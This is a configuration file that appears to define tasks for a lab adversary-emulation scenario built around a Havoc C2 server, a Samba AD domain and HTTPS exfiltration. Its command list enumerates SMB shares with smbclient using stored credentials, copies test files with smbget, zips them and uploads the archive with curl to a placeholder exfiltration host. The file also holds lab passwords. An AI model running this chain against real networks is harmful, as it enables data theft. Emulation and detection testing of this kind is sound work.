[exfil_task]
exfil_type = https
exfil_port = 443
exfil_outfile = exfil_file.zip
domain_name = None
cert_subj = /C=US/ST=Utah/L=Lehi/O=Your Company, Inc./OU=IT/CN=$HOST

[remote_ad_task]
task_name = remote_trainman_ad
ad_tld = local
ad_domain = samdom
ad_realm = SAMDOM.LOCAL
user_name = jdisco
user_password = user_password_152637
admin_password = samdom_password_152637

[remote_c2_agent_task]
task_name = remote_trainman_agent

[c2_task]
task_name = c2_http_MM_dd_YYYY_HH_mm
agent_name = 1w2x3y4z
command_list = smbclient '//$TARGET/$USER_NAME' -c 'recurse;ls' -U $USER_NAME%%$USER_PASSWORD, smbclient '//$TARGET/users' -c 'recurse;ls' -U $USER_NAME%%$USER_PASSWORD, smbget smb://$TARGET/$USER_NAME/sample-data.csv -o /opt/havoc/shared/sample-data.csv -U $USER_NAME%%$USER_PASSWORD, smbget smb://$TARGET/$USER_NAME/test-5mb.bin -o /opt/havoc/shared/test-5mb.bin -U $USER_NAME%%$USER_PASSWORD, smbget smb://$TARGET/users/test-10mb.bin -o /opt/havoc/shared/test-10mb.bin -U $USER_NAME%%$USER_PASSWORD, smbget smb://$TARGET/users/test-20mb.bin -o /opt/havoc/shared/test-20mb.bin -U $USER_NAME%%$USER_PASSWORD, zip /opt/havoc/shared/$EXFIL_OUTFILE /opt/havoc/shared/*.csv /opt/havoc/shared/*.bin, curl -kF file=@/opt/havoc/shared/$EXFIL_OUTFILE $EXFIL_TYPE://$EXFIL_HOST:$EXFIL_PORT/p
